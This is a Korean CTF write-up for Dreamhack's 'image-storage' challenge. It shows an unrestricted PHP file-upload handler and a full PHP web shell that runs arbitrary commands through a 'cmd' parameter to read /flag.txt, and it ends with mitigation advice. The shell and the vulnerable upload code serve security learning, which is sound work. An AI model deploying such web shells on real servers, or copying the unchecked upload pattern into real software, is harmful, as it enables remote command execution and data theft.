[Dreamhack] Level1: image-storage

🛎️ Access

php로 작성된 파일 저장 서비스이다.

파일 업로드 취약점을 이용해 플래그를 획득. 플래그는 /flag.txt에 있다.

 

👾 Exploit Algorithm & Payload

> index.php

<html>
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css">
<title>Image Storage</title>
</head>
<body>
    <!-- Fixed navbar -->
    <nav class="navbar navbar-default navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <a class="navbar-brand" href="/">Image Storage</a>
        </div>
        <div id="navbar">
          <ul class="nav navbar-nav">
            <li><a href="/">Home</a></li>
            <li><a href="/list.php">List</a></li>
            <li><a href="/upload.php">Upload</a></li>
          </ul>

        </div><!--/.nav-collapse -->
      </div>
    </nav><br/><br/>
    <div class="container">
    	<h2>Upload and Share Image !</h2>
    </div> 
</body>
</html>

> list.php

<html>
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css">
<title>Image Storage</title>
</head>
<body>
    <!-- Fixed navbar -->
    <nav class="navbar navbar-default navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <a class="navbar-brand" href="/">Image Storage</a>
        </div>
        <div id="navbar">
          <ul class="nav navbar-nav">
            <li><a href="/">Home</a></li>
            <li><a href="/list.php">List</a></li>
            <li><a href="/upload.php">Upload</a></li>
          </ul>

        </div><!--/.nav-collapse -->
      </div>
    </nav><br/><br/><br/>
    <div class="container"><ul>
    <?php
        $directory = './uploads/';
        $scanned_directory = array_diff(scandir($directory), array('..', '.', 'index.html'));
        foreach ($scanned_directory as $key => $value) {
            echo "<li><a href='{$directory}{$value}'>".$value."</a></li><br/>";
        }
    ?> 
    </ul></div> 
</body>
</html>

> upload.php

<?php
  if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_FILES)) {
      $directory = './uploads/';
      $file = $_FILES["file"];
      $error = $file["error"];
      $name = $file["name"];
      $tmp_name = $file["tmp_name"];
     
      if ( $error > 0 ) {
        echo "Error: " . $error . "<br>";
      }else {
        if (file_exists($directory . $name)) {
          echo $name . " already exists. ";
        }else {
          if(move_uploaded_file($tmp_name, $directory . $name)){
            echo "Stored in: " . $directory . $name;
          }
        }
      }
    }else {
        echo "Error !";
    }
    die();
  }
?>
<html>
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css">
<title>Image Storage</title>
</head>
<body>
    <!-- Fixed navbar -->
    <nav class="navbar navbar-default navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <a class="navbar-brand" href="/">Image Storage</a>
        </div>
        <div id="navbar">
          <ul class="nav navbar-nav">
            <li><a href="/">Home</a></li>
            <li><a href="/list.php">List</a></li>
            <li><a href="/upload.php">Upload</a></li>
          </ul>
        </div><!--/.nav-collapse -->
      </div>
    </nav><br/><br/><br/>
    <div class="container">
      <form enctype='multipart/form-data' method="POST">
        <div class="form-group">
          <label for="InputFile">파일 업로드</label>
          <input type="file" id="InputFile" name="file">
        </div>
        <input type="submit" class="btn btn-default" value="Upload">
      </form>
    </div> 
</body>
</html>

 

 

#1

---

: '/upload.php' 페이지에서 파일을 업로드 할 수 있는 것을 확인했다.

 

: '/list.php' 페이지에서 파일을 업로드하면 목록을 확인할 수 있을 것으로 보인다.

 

 

#2

---

: .php 확장자로 업로드 시도하였더니 './uploads/'라는 경로에 upload.php가 저장된다는 것을 확인할 수 있다.

: URL에 /uploads라는 폴더에 접근하였더니 폴더 접근이 가능한 것으로 확인된다.

 

 

: 또한 '/list.php' 페이지에 방금 업로드 했던 파일을 확인할 수 있고, 클릭 시 '/uploads/test.php' 파일에 접근할 수 있다. 

: 여기서는 파일 업로드가 가능한지 확인하기 위해서 .php 확장자에 아무것도 입력하지 않아 결과 값을 확인할 수 없었지만 .php 백도어 쉘 코드를 작성하면 시스템의 폴더에 접근할 수 있을 것으로 예상된다.

 

 

#3

---

<?php
    echo 'Enter a Command:<br>';
    echo '<form action="">';
    echo '<input type=text name="cmd">';
    echo '<input type="submit">';
    echo '</form>';

    if (isset($_GET['cmd'])) {
        $commands = explode("\n", $_GET['cmd']); // Split commands by newline
        foreach ($commands as $command) {
            $output = shell_exec($command); // Execute each command
            echo "<pre>$command:\n$output</pre><br>"; // Display command and output
        }
    }
?>

: .php 백도어 스크립트를 작성한 후 업로드하면 '/uploads/exploit.php' 파일에서 '?cmd=' 파라미터를 이용한 시스템 명령을 보낼 수 있다.

 

 

🔑Analysis and results for obtaining the Flag DH{…}

---

: 백도어 스크립트를 업로드한 후, 업로드한 경로에서 시스템 명령을 통해 파일을 탐색하고 FLAG를 획득할 수 있다.

 

[+]

: 해당 권한에 대한 파일들을 열람하여 주요 정보를 획득할 수도 있다.

 

 

📌 Summary

---

-대응방안-

웹 리소스는 정적 리소스(JPG, PNG, MPV, ..)와 동적 리소스(PHP, JSP)로 분류할 수 있는데 동적 리소스는 서버에서 실행되는 것으로 이 동적 리소스의 확장자를 제한한다면 파일 업로드 취약점 공격으로부터 서버를 보호할 수 있음

AWS, Azure, GCP 등의 정적 스토리지를 이용하여 서버의 파일 시스템을 이용하지 않게 하는 것으로 업로드 취약점을 예방할 수 있음

 

...

 

-File Vulnerability(File upload)-

| Path Traversal |

: 악의적 이용자가 웹 서버의 소스 코드나 서버에 있는 중요 시스템 파일을 변조 및 덮어쓰기와 같은 행동을 하기 위해서 업로드에 존재하는 제약 조건을 우회하여 임의의 디렉토리에 파일을 찾고 업로드하는 취약점 (./ , ../ , 등등 )

 

| WebShell |

: .jsp, .php 등의 확장자로 원하는 시스템 명령을 업로드 시켜 (CGI(Command Graphic Interface)로 실행되는 파일) Path Traversal 취약점과 연계하여 업로드 폴더를 벗어나 공격자의 파일을 저장 및 변경 등의 공격을 수행하는 업로드 취약점